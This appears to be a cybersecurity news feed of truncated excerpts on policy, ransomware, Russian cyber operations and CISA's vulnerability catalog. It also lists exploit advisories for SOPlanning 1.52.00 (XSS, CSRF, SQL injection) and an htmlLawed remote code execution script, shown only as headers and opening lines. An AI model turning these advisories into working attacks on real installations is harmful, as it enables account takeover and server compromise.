Just five months after President Joe Biden tapped Anne Neuberger to be his deputy national security adviser for cyber and emerging technologies, the Colonial Pipeline ransomware attack took the country’s largest fuel pipeline offline for six days. It was something of a wakeup call: Across the country, gas prices spiked, fuel supplies plummeted, and there were gas lines up and down the Eastern Seaboard. Neuberger, who was a top official at the National Security Agency for more than a decade before moving to the White House, has spent the last three years looking for ways not just to preve ..read more

Authored by liquidsky SOPlanning version 1.52.00 suffers from a cross site scripting vulnerability in groupe_save.php. Change Mirror Download Exploit Title: SOPlanning v1.52.00 'groupe_save.php' XSS (Reflected XSS)Application: SOPlanningVersion: 1.52.00Date: 4/22/24Exploit Author: Joseph McPeters (Liquidsky)Vendor Homepage: https://www.soplanning.org/en/Software Link: https://sourceforge.net/projects/soplanning/Tested on: LinuxCVE: Not yet assignedDescription: SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account ..read more

Authored by liquidsky SOPlanning version 1.52.00 suffers from a cross site request forgery vulnerability in xajax_server.php. Change Mirror Download <!--Exploit Title: SOPlanning v1.52.00 'xajax_server.php' CSRF (Account Takeover)Application: SOPlanningVersion: 1.52.00Date: 4/22/24Exploit Author: Joseph McPeters (Liquidsky)Vendor Homepage: https://www.soplanning.org/en/Software Link: https://sourceforge.net/projects/soplanning/Tested on: LinuxCVE: Not yet assignedDescription: SOPlanning v1.52.00 is vulnerable to CSRF via 'xajax_server.php' a remote unautheticated attacker can hijack the a ..read more

Authored by liquidsky SOPlanning version 1.52.00 suffers from a remote SQL injection vulnerability in projects.php. Change Mirror Download Exploit Title: SOPlanning v1.52.00 'projets.php' SQLiApplication: SOPlanningVersion: 1.52.00Date: 4/22/24Exploit Author: Joseph McPeters (Liquidsky)Vendor Homepage: https://www.soplanning.org/en/Software Link: https://sourceforge.net/projects/soplanning/Tested on: LinuxCVE: Not yet assignedDescription: SOPlanning v1.52.00 is vulnerable to Authenticated SQL Injection via the 'projects.php' page.Instructions: Authenticate to the host, the credentials can be ..read more

Researchers have found that a catalog of exploited vulnerabilities maintained by the federal government  is having a tangibly positive effect on organizations both within and outside of the federal government. The Cybersecurity and Infrastructure Security Agency (CISA) has run its Known Exploited Vulnerabilities (KEV) catalog for nearly three years and it has quickly become the go-to repository for software and hardware bugs actively being exploited by hackers around the world. Experts at cybersecurity scanning company Bitsight posed the question, “do organizations remediate KE ..read more

Ukraine’s government is reporting an increase in financially motivated cyberattacks conducted by previously unidentified hackers associated with Russia.  According to a recent report, these groups have grown more active in Ukrainian networks in the latter half of 2023, causing a shift in the ongoing cyberwar previously dominated by well-known Kremlin-supported hacker groups like Sandworm and Armageddon. “The emergence of new actors suggests a deliberate strategy by Russia to diversify its cyberwarfare arsenal,” said Yevheniia Volivnyk, chief of Ukraine’s computer emergency response team ..read more

In recent weeks NATO allies and European Union member states have made a series of allegations about Russian hybrid operations targeting their countries, prompting both the alliance and the bloc to formally condemn the Kremlin’s conduct. The North Atlantic Council, NATO’s political executive, announced on Thursday that allies were “deeply concerned about recent malign activities on Allied territory, including those resulting in the investigation and charging of multiple individuals in connection with hostile state activity.” A range of activities have come to light following counterintelligen ..read more

Authored by d4t4s3c htmlLawed versions 1.2.5 and below proof of concept remote command execution exploit. advisories | CVE-2022-35914 Change Mirror Download #!/bin/bash# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution# Date: 2024-05-02# Exploit Author: Miguel Redondo (aka d4t4s3c)# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed# Software Link: https://github.com/kesar/HTMLawed# Version: <= 1.2.5# Tested on: Linux# Category: Web Application# CVE: CVE-2022-35914while getopts ":u:c:" arg; do case ${arg} in u) url=${OPTARG}; let paramet ..read more

May 01, 2024The Hacker NewsSecurity Awareness Training There’s a natural human desire to avoid threatening scenarios. The irony, of course, is if you hope to attain any semblance of security, you’ve got to remain prepared to confront those very same threats. As a decision-maker for your organization, you know this well. But no matter how many experts or trusted cybersecurity tools your organization has a standing guard, you’re only as secure as your weakest link. There’s still one group that can inadvertently open the gates to unwanted threat actors—your own people. Security must be seco ..read more

May 02, 2024NewsroomRansomware / Cyber Crime A Ukrainian national has been sentenced to more than 13 years in prison and ordered to pay $16 million in restitution for carrying out thousands of ransomware attacks and extorting victims. Yaroslav Vasinskyi (aka Rabotnik), 24, along with his co-conspirators part of the REvil ransomware group orchestrated more than 2,500 ransomware attacks and demanded ransom payments in cryptocurrency totaling more than $700 million. “The co-conspirators demanded ransom payments in cryptocurrency and used cryptocurrency exchangers and mixing services to hide ..read more